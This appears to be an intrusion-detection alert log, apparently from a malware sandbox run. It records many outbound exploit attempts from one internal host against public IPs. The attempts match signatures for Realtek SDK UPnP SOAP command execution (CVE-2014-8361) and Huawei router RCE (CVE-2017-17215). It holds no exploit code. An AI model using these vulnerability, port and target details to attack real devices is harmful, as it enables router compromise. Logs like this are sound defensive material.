                                                07/20/24-23:05:47.182639TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614082852869192.168.2.1486.169.138.209
                                                07/20/24-23:05:42.134564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067237215192.168.2.14157.131.240.41
                                                07/20/24-23:06:15.532287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6068452869192.168.2.14174.109.92.117
                                                07/20/24-23:05:57.166360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5825852869192.168.2.14112.83.97.45
                                                07/20/24-23:05:57.239251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3683052869192.168.2.14110.73.58.137
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396037215192.168.2.1441.165.208.89
                                                07/20/24-23:05:57.820676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5886652869192.168.2.14191.41.212.93
                                                07/20/24-23:06:10.600919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3541652869192.168.2.14194.77.230.54
                                                07/20/24-23:05:56.121210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481237215192.168.2.1441.241.41.15
                                                07/20/24-23:05:57.062143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3876652869192.168.2.14162.5.20.207
                                                07/20/24-23:05:57.130961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24622852869192.168.2.1444.81.94.227
                                                07/20/24-23:05:36.295378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5419852869192.168.2.14107.117.108.202
                                                07/20/24-23:05:38.780537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4620852869192.168.2.14153.164.18.4
                                                07/20/24-23:05:57.865744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23403452869192.168.2.14191.34.113.0
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390637215192.168.2.14197.187.231.237
                                                07/20/24-23:06:33.528209TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614964652869192.168.2.14146.85.252.85
                                                07/20/24-23:05:45.439167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086037215192.168.2.1441.210.17.99
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845037215192.168.2.14197.6.98.173
                                                07/20/24-23:05:58.995753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4085252869192.168.2.14194.151.47.138
                                                07/20/24-23:06:12.946390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3855652869192.168.2.14197.21.16.30
                                                07/20/24-23:05:57.200464TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615487452869192.168.2.1454.23.238.110
                                                07/20/24-23:05:47.530339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002852869192.168.2.1464.214.151.9
                                                07/20/24-23:05:35.158885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5620652869192.168.2.14148.2.12.125
                                                07/20/24-23:05:58.006516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3502052869192.168.2.14155.70.176.109
                                                07/20/24-23:05:46.135626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970837215192.168.2.1441.84.209.9
                                                07/20/24-23:05:52.466707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24903052869192.168.2.14161.61.246.176
                                                07/20/24-23:06:08.993749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113837215192.168.2.14197.194.101.97
                                                07/20/24-23:05:39.054227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772837215192.168.2.14133.244.69.120
                                                07/20/24-23:05:39.327041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615943652869192.168.2.14183.189.61.173
                                                07/20/24-23:05:35.184596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614992252869192.168.2.1451.156.205.139
                                                07/20/24-23:05:52.478142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5655252869192.168.2.14147.148.71.168
                                                07/20/24-23:05:35.931996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6076252869192.168.2.1449.132.116.240
                                                07/20/24-23:05:56.402085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701437215192.168.2.1441.100.174.46
                                                07/20/24-23:05:37.447452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24575252869192.168.2.14147.14.244.79
                                                07/20/24-23:05:39.055908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.14157.215.22.6
                                                07/20/24-23:06:12.572216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616030652869192.168.2.14179.20.228.12
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266237215192.168.2.14126.14.33.154
                                                07/20/24-23:05:50.510455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288837215192.168.2.14157.68.23.170
                                                07/20/24-23:06:12.350524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615143252869192.168.2.1412.14.97.209
                                                07/20/24-23:06:53.637724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5998252869192.168.2.1436.129.152.48
                                                07/20/24-23:05:37.560327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24834652869192.168.2.14114.248.35.135
                                                07/20/24-23:06:09.594551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615924852869192.168.2.14204.180.211.11
                                                07/20/24-23:05:45.374653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129237215192.168.2.14109.209.115.160
                                                07/20/24-23:05:33.861088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313237215192.168.2.14157.124.133.127
                                                07/20/24-23:06:21.718589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5861252869192.168.2.14149.227.126.225
                                                07/20/24-23:05:57.619304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25043852869192.168.2.1431.186.230.47
                                                07/20/24-23:05:38.057117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3847652869192.168.2.14122.165.176.151
                                                07/20/24-23:07:04.643171TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615460652869192.168.2.14197.171.226.89
                                                07/20/24-23:05:35.991937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615695852869192.168.2.14102.124.228.209
                                                07/20/24-23:06:05.685689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5851452869192.168.2.14149.27.20.44
                                                07/20/24-23:05:38.953643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147037215192.168.2.14175.191.255.72
                                                07/20/24-23:06:05.233952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5805852869192.168.2.14176.50.156.26
                                                07/20/24-23:06:00.177523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3525852869192.168.2.14173.6.68.101
                                                07/20/24-23:06:19.930679TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614304852869192.168.2.1423.188.123.27
                                                07/20/24-23:06:11.202361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4754252869192.168.2.14222.179.154.42
                                                07/20/24-23:05:37.441297TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23796852869192.168.2.14148.30.198.131
                                                07/20/24-23:05:52.676146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5574652869192.168.2.14222.102.111.169
                                                07/20/24-23:06:00.163232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25446852869192.168.2.1480.185.192.112
                                                07/20/24-23:05:35.358336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615023852869192.168.2.1414.214.68.156
                                                07/20/24-23:05:38.944157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824637215192.168.2.1441.7.52.246
                                                07/20/24-23:05:35.210083TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644452869192.168.2.1457.131.227.3
                                                07/20/24-23:05:57.227564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614306452869192.168.2.1458.185.111.115
                                                07/20/24-23:06:53.291407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3808452869192.168.2.14139.245.84.27
                                                07/20/24-23:05:46.119639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272637215192.168.2.1441.82.10.191
                                                07/20/24-23:05:57.004757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6012252869192.168.2.148.115.28.187
                                                07/20/24-23:05:37.527690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25829652869192.168.2.14212.160.183.244
                                                07/20/24-23:05:39.685214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262837215192.168.2.14157.182.235.28
                                                07/20/24-23:06:35.309569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613304652869192.168.2.14170.60.139.10
                                                07/20/24-23:05:40.426800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3415252869192.168.2.14176.44.128.80
                                                07/20/24-23:06:16.651508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3390252869192.168.2.14104.134.119.164
                                                07/20/24-23:05:37.524280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341252869192.168.2.14190.147.108.124
                                                07/20/24-23:06:34.148721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4771652869192.168.2.1468.185.233.236
                                                07/20/24-23:06:56.433850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5386052869192.168.2.14165.79.131.219
                                                07/20/24-23:05:42.145992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3423637215192.168.2.14157.197.122.190
                                                07/20/24-23:06:01.485669TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25086052869192.168.2.1435.138.240.228
                                                07/20/24-23:06:38.067768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3861652869192.168.2.1418.183.102.66
                                                07/20/24-23:06:14.686896TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614957652869192.168.2.1498.16.115.167
                                                07/20/24-23:05:48.748554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3748037215192.168.2.14157.242.85.182
                                                07/20/24-23:06:24.805050TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25712252869192.168.2.1442.207.160.235
                                                07/20/24-23:05:38.791586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5793052869192.168.2.14187.211.186.240
                                                07/20/24-23:06:12.189668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25451852869192.168.2.14122.215.163.185
                                                07/20/24-23:06:24.853073TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4328852869192.168.2.14117.253.38.147
                                                07/20/24-23:05:37.443569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23900052869192.168.2.1420.226.134.71
                                                07/20/24-23:06:06.967288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6022452869192.168.2.14133.98.16.57
                                                07/20/24-23:06:08.476019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3458252869192.168.2.14111.86.168.149
                                                07/20/24-23:06:55.227510TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25200052869192.168.2.14182.114.119.16
                                                07/20/24-23:05:37.440953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3578252869192.168.2.1441.109.181.54
                                                07/20/24-23:06:11.320570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3334452869192.168.2.1450.132.36.140
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343437215192.168.2.1441.44.12.17
                                                07/20/24-23:05:58.008667TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613372452869192.168.2.14102.91.220.41
                                                07/20/24-23:05:40.488770TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26002452869192.168.2.1442.188.126.193
                                                07/20/24-23:05:58.867091TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4697252869192.168.2.1490.130.53.27
                                                07/20/24-23:05:46.309937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614120052869192.168.2.14192.36.100.230
                                                07/20/24-23:07:03.257276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615552452869192.168.2.14107.84.65.143
                                                07/20/24-23:05:48.800446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719437215192.168.2.14197.73.33.62
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437037215192.168.2.14157.21.213.253
                                                07/20/24-23:05:37.454427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23991052869192.168.2.14190.231.104.96
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066237215192.168.2.14197.130.43.165
                                                07/20/24-23:05:40.330643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210252869192.168.2.1475.119.92.151
                                                07/20/24-23:05:38.409616TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614044452869192.168.2.1431.43.154.194
                                                07/20/24-23:06:03.136885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3801252869192.168.2.14195.159.191.213
                                                07/20/24-23:05:37.489811TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25278252869192.168.2.14119.83.111.97
                                                07/20/24-23:06:19.491493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4361452869192.168.2.1435.37.174.94
                                                07/20/24-23:05:35.909217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615307252869192.168.2.1473.174.204.179
                                                07/20/24-23:08:36.017976TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24632852869192.168.2.14143.103.141.123
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684237215192.168.2.1441.96.155.17
                                                07/20/24-23:05:36.590112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669437215192.168.2.14197.144.144.114
                                                07/20/24-23:06:05.139331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615226652869192.168.2.14223.121.185.59
                                                07/20/24-23:05:50.542034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051237215192.168.2.14212.54.87.240
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763237215192.168.2.14157.81.32.84
                                                07/20/24-23:06:15.005197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711252869192.168.2.14143.160.225.122
                                                07/20/24-23:05:59.453008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5890052869192.168.2.14165.137.205.188
                                                07/20/24-23:06:00.006350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906452869192.168.2.14103.96.99.69
                                                07/20/24-23:05:40.475273TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24770052869192.168.2.14183.13.10.198
                                                07/20/24-23:06:31.391870TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5406452869192.168.2.1486.70.141.165
                                                07/20/24-23:05:36.329793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664037215192.168.2.14197.169.144.88
                                                07/20/24-23:05:36.258778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614320652869192.168.2.1465.155.38.231
                                                07/20/24-23:05:35.839000TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613864652869192.168.2.14223.250.141.64
                                                07/20/24-23:05:36.329793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500037215192.168.2.1441.74.212.1
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752237215192.168.2.14197.125.116.0
                                                07/20/24-23:05:52.546679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4127252869192.168.2.14138.44.159.137
                                                07/20/24-23:05:52.570741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3853252869192.168.2.14161.253.139.174
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862037215192.168.2.14197.248.41.204
                                                07/20/24-23:06:11.223856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3992252869192.168.2.14183.168.204.172
                                                07/20/24-23:05:37.449942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24427452869192.168.2.1480.130.32.22
                                                07/20/24-23:06:00.435146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614688652869192.168.2.14144.194.126.32
                                                07/20/24-23:05:36.329793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531237215192.168.2.14197.113.213.112
                                                07/20/24-23:06:40.199749TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5078452869192.168.2.14197.174.120.97
                                                07/20/24-23:06:05.199501TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615439452869192.168.2.14116.229.240.238
                                                07/20/24-23:05:37.560327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4520652869192.168.2.14103.14.70.39
                                                07/20/24-23:05:59.565815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4757252869192.168.2.1468.28.176.54
                                                07/20/24-23:06:18.935568TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3983652869192.168.2.1437.41.70.141
                                                07/20/24-23:05:38.216515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3580052869192.168.2.1450.3.84.134
                                                07/20/24-23:06:09.712957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614033452869192.168.2.1444.212.106.74
                                                07/20/24-23:05:36.303495TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614001852869192.168.2.14100.147.99.239
                                                07/20/24-23:05:57.651872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5835852869192.168.2.14172.221.181.52
                                                07/20/24-23:06:01.824929TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23719652869192.168.2.1499.157.115.85
                                                07/20/24-23:05:36.310523TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614816052869192.168.2.1439.176.203.73
                                                07/20/24-23:06:03.208973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614130052869192.168.2.1457.62.122.118
                                                07/20/24-23:05:48.186768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615058252869192.168.2.1434.107.33.161
                                                07/20/24-23:06:03.387430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791237215192.168.2.14197.69.134.164
                                                07/20/24-23:07:37.315997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5955052869192.168.2.14186.145.2.207
                                                07/20/24-23:05:36.352367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3901052869192.168.2.14197.23.60.58
                                                07/20/24-23:05:48.748553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118237215192.168.2.1441.108.224.194
                                                07/20/24-23:06:14.583817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615286852869192.168.2.14192.174.164.210
                                                07/20/24-23:06:49.853581TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24094052869192.168.2.1447.168.17.153
                                                07/20/24-23:05:38.211354TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615053252869192.168.2.1497.213.55.119
                                                07/20/24-23:05:47.958429TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3364052869192.168.2.14194.214.58.142
                                                07/20/24-23:05:39.187903TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613768452869192.168.2.14203.213.235.166
                                                07/20/24-23:05:39.327041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5943652869192.168.2.14183.189.61.173
                                                07/20/24-23:05:39.067591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257637215192.168.2.14157.239.39.122
                                                07/20/24-23:05:37.462432TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24857652869192.168.2.141.146.229.84
                                                07/20/24-23:05:40.430092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25844452869192.168.2.1443.253.131.181
                                                07/20/24-23:06:02.997059TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23906452869192.168.2.14217.234.142.206
                                                07/20/24-23:05:52.537891TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23831252869192.168.2.14191.198.16.14
                                                07/20/24-23:06:09.557113TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23863252869192.168.2.14201.226.14.177
                                                07/20/24-23:05:50.522256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677437215192.168.2.1441.87.90.169
                                                07/20/24-23:05:59.290948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25755452869192.168.2.14187.11.67.4
                                                07/20/24-23:06:01.480449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5166452869192.168.2.14138.239.248.75
                                                07/20/24-23:06:03.368314TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614080852869192.168.2.1442.230.189.186
                                                07/20/24-23:06:34.098635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614958252869192.168.2.1439.59.93.29
                                                07/20/24-23:05:48.053184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5748052869192.168.2.14154.45.85.205
                                                07/20/24-23:05:37.472951TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24476052869192.168.2.14142.219.250.29
                                                07/20/24-23:05:57.187455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616067052869192.168.2.14208.177.199.121
                                                07/20/24-23:05:39.055909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737437215192.168.2.14197.81.83.46
                                                07/20/24-23:06:05.864515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614932852869192.168.2.1472.135.129.227
                                                07/20/24-23:05:37.476343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751652869192.168.2.1451.156.162.59
                                                07/20/24-23:05:52.539655TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25422052869192.168.2.1412.205.1.20
                                                07/20/24-23:05:57.540063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4040252869192.168.2.14128.103.206.27
                                                07/20/24-23:05:56.699362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6011052869192.168.2.14223.229.22.78
                                                07/20/24-23:06:01.121675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3335852869192.168.2.14114.138.107.32
                                                07/20/24-23:05:50.524010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332637215192.168.2.1441.35.178.191
                                                07/20/24-23:05:57.017538TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24693252869192.168.2.14175.105.64.16
                                                07/20/24-23:05:38.597370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4044052869192.168.2.14141.149.116.120
                                                07/20/24-23:05:58.415863TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613391852869192.168.2.14209.62.86.250
                                                07/20/24-23:06:16.584797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5638452869192.168.2.14183.52.83.104
                                                07/20/24-23:05:34.622609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563237215192.168.2.14157.37.121.244
